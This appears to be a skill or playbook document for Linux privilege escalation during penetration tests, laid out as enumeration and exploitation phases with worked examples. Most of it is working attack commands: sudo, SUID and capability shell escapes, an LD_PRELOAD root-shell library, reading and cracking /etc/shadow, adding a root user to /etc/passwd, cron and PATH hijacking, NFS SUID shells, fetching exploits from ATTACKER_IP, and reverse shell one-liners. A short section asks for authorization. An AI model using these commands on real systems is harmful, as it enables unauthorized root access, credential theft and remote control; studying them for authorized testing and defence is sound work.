Linux Privilege Escalation
Purpose
Execute systematic privilege escalation assessments on Linux systems to identify and exploit misconfigurations, vulnerable services, and security weaknesses that allow elevation from low-privilege user access to root-level control. This skill enables comprehensive enumeration and exploitation of kernel vulnerabilities, sudo misconfigurations, SUID binaries, cron jobs, capabilities, PATH hijacking, and NFS weaknesses.
Inputs / Prerequisites
Required Access
-
Low-privilege shell access to target Linux system
-
Ability to execute commands (interactive or semi-interactive shell)
-
Network access for reverse shell connections (if needed)
-
Attacker machine for payload hosting and receiving shells
Technical Requirements
-
Understanding of Linux filesystem permissions and ownership
-
Familiarity with common Linux utilities and scripting
-
Knowledge of kernel versions and associated vulnerabilities
-
Basic understanding of compilation (gcc) for custom exploits
Recommended Tools
-
LinPEAS, LinEnum, or Linux Smart Enumeration scripts
-
Linux Exploit Suggester (LES)
-
GTFOBins reference for binary exploitation
-
John the Ripper or Hashcat for password cracking
-
Netcat or similar for reverse shells
Outputs / Deliverables
Primary Outputs
-
Root shell access on target system
-
Privilege escalation path documentation
-
System enumeration findings report
-
Recommendations for remediation
Evidence Artifacts
-
Screenshots of successful privilege escalation
-
Command output logs demonstrating root access
-
Identified vulnerability details
-
Exploited configuration files
Core Workflow
Phase 1: System Enumeration
Basic System Information
Gather fundamental system details for vulnerability research:
Hostname and system role
hostname
Kernel version and architecture
uname -a
Detailed kernel information
cat /proc/version
Operating system details
cat /etc/issue cat /etc/*-release
Architecture
arch
User and Permission Enumeration
Current user context
whoami id
Users with login shells
cat /etc/passwd | grep -v nologin | grep -v false
Users with home directories
cat /etc/passwd | grep home
Group memberships
groups
Other logged-in users
w who
Network Information
Network interfaces
ifconfig ip addr
Routing table
ip route
Active connections
netstat -antup ss -tulpn
Listening services
netstat -l
Process and Service Enumeration
All running processes
ps aux ps -ef
Process tree view
ps axjf
Services running as root
ps aux | grep root
Environment Variables
Full environment
env
PATH variable (for hijacking)
echo $PATH
Phase 2: Automated Enumeration
Deploy automated scripts for comprehensive enumeration:
LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
LinEnum
./LinEnum.sh -t
Linux Smart Enumeration
./lse.sh -l 1
Linux Exploit Suggester
./les.sh
Transfer scripts to target system:
On attacker machine
python3 -m http.server 8000
On target machine
wget http://ATTACKER_IP:8000/linpeas.sh chmod +x linpeas.sh ./linpeas.sh
Phase 3: Kernel Exploits
Identify Kernel Version
uname -r cat /proc/version
Search for Exploits
Use Linux Exploit Suggester
./linux-exploit-suggester.sh
Manual search on exploit-db
searchsploit linux kernel [version]
Common Kernel Exploits
Kernel Version Exploit CVE
2.6.x - 3.x Dirty COW CVE-2016-5195
4.4.x - 4.13.x Double Fetch CVE-2017-16995
5.8+ Dirty Pipe CVE-2022-0847
Compile and Execute
Transfer exploit source
wget http://ATTACKER_IP/exploit.c
Compile on target
gcc exploit.c -o exploit
Execute
./exploit
Phase 4: Sudo Exploitation
Enumerate Sudo Privileges
sudo -l
GTFOBins Sudo Exploitation
Reference https://gtfobins.github.io for exploitation commands:
Example: vim with sudo
sudo vim -c ':!/bin/bash'
Example: find with sudo
sudo find . -exec /bin/sh ; -quit
Example: awk with sudo
sudo awk 'BEGIN {system("/bin/bash")}'
Example: python with sudo
sudo python -c 'import os; os.system("/bin/bash")'
Example: less with sudo
sudo less /etc/passwd !/bin/bash
LD_PRELOAD Exploitation
When env_keep includes LD_PRELOAD:
// shell.c #include <stdio.h> #include <sys/types.h> #include <stdlib.h>
void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); }
Compile shared library
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
Execute with sudo
sudo LD_PRELOAD=/tmp/shell.so find
Phase 5: SUID Binary Exploitation
Find SUID Binaries
find / -type f -perm -04000 -ls 2>/dev/null find / -perm -u=s -type f 2>/dev/null
Exploit SUID Binaries
Reference GTFOBins for SUID exploitation:
Example: base64 for file reading
LFILE=/etc/shadow base64 "$LFILE" | base64 -d
Example: cp for file writing
cp /bin/bash /tmp/bash chmod +s /tmp/bash /tmp/bash -p
Example: find with SUID
find . -exec /bin/sh -p ; -quit
Password Cracking via SUID
Read shadow file (if base64 has SUID)
base64 /etc/shadow | base64 -d > shadow.txt base64 /etc/passwd | base64 -d > passwd.txt
On attacker machine
unshadow passwd.txt shadow.txt > hashes.txt john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Add User to passwd (if nano/vim has SUID)
Generate password hash
openssl passwd -1 -salt new newpassword
Add to /etc/passwd (using SUID editor)
newuser:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
Phase 6: Capabilities Exploitation
Enumerate Capabilities
getcap -r / 2>/dev/null
Exploit Capabilities
Example: python with cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Example: vim with cap_setuid
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/bash", "bash", "-c", "reset; exec bash")'
Example: perl with cap_setuid
perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
Phase 7: Cron Job Exploitation
Enumerate Cron Jobs
System crontab
cat /etc/crontab
User crontabs
ls -la /var/spool/cron/crontabs/
Cron directories
ls -la /etc/cron.*
Systemd timers
systemctl list-timers
Exploit Writable Cron Scripts
Identify writable cron script from /etc/crontab
ls -la /opt/backup.sh # Check permissions echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' >> /opt/backup.sh
If cron references non-existent script in writable PATH
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' > /home/user/antivirus.sh chmod +x /home/user/antivirus.sh
Phase 8: PATH Hijacking
Find SUID binary calling external command
strings /usr/local/bin/suid-binary
Shows: system("service apache2 start")
Hijack by creating malicious binary in writable PATH
export PATH=/tmp:$PATH echo -e '#!/bin/bash\n/bin/bash -p' > /tmp/service chmod +x /tmp/service /usr/local/bin/suid-binary # Execute SUID binary
Phase 9: NFS Exploitation
On target - look for no_root_squash option
cat /etc/exports
On attacker - mount share and create SUID binary
showmount -e TARGET_IP mount -o rw TARGET_IP:/share /tmp/nfs
Create and compile SUID shell
echo 'int main(){setuid(0);setgid(0);system("/bin/bash");return 0;}' > /tmp/nfs/shell.c gcc /tmp/nfs/shell.c -o /tmp/nfs/shell && chmod +s /tmp/nfs/shell
On target - execute
/share/shell
Quick Reference
Enumeration Commands Summary
Purpose Command
Kernel version uname -a
Current user id
Sudo rights sudo -l
SUID files find / -perm -u=s -type f 2>/dev/null
Capabilities getcap -r / 2>/dev/null
Cron jobs cat /etc/crontab
Writable dirs find / -writable -type d 2>/dev/null
NFS exports cat /etc/exports
Reverse Shell One-Liners
Bash
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'
Netcat
nc -e /bin/bash ATTACKER_IP 4444
Perl
perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");'
Key Resources
-
GTFOBins: https://gtfobins.github.io
-
Linux Exploit Suggester: https://github.com/mzet-/linux-exploit-suggester
Constraints and Guardrails
Operational Boundaries
-
Verify kernel exploits in test environment before production use
-
Failed kernel exploits may crash the system
-
Document all changes made during privilege escalation
-
Maintain access persistence only as authorized
Technical Limitations
-
Modern kernels may have exploit mitigations (ASLR, SMEP, SMAP)
-
AppArmor/SELinux may restrict exploitation techniques
-
Container environments limit kernel-level exploits
-
Hardened systems may have restricted sudo configurations
Legal and Ethical Requirements
-
Written authorization required before testing
-
Stay within defined scope boundaries
-
Report critical findings immediately
-
Do not access data beyond scope requirements
Examples
Example 1: Sudo to Root via find
Scenario: User has sudo rights for find command
$ sudo -l User user may run the following commands: (root) NOPASSWD: /usr/bin/find
$ sudo find . -exec /bin/bash ; -quit
id
uid=0(root) gid=0(root) groups=0(root)
Example 2: SUID base64 for Shadow Access
Scenario: base64 binary has SUID bit set
$ find / -perm -u=s -type f 2>/dev/null | grep base64 /usr/bin/base64
$ base64 /etc/shadow | base64 -d root:$6$xyz...:18000:0:99999:7:::
Crack offline with john
$ john --wordlist=rockyou.txt shadow.txt
Example 3: Cron Job Script Hijacking
Scenario: Root cron job executes writable script
$ cat /etc/crontab
-
-
-
-
- root /opt/scripts/backup.sh
-
-
-
$ ls -la /opt/scripts/backup.sh -rwxrwxrwx 1 root root 50 /opt/scripts/backup.sh
$ echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /opt/scripts/backup.sh
Wait 1 minute
$ /tmp/bash -p
id
uid=1000(user) gid=1000(user) euid=0(root)
Troubleshooting
Issue Solutions
Exploit compilation fails Check for gcc: which gcc ; compile on attacker for same arch; use gcc -static
Reverse shell not connecting Check firewall; try ports 443/80; use staged payloads; check egress filtering
SUID binary not exploitable Verify version matches GTFOBins; check AppArmor/SELinux; some binaries drop privileges
Cron job not executing Verify cron running: service cron status ; check +x permissions; verify PATH in crontab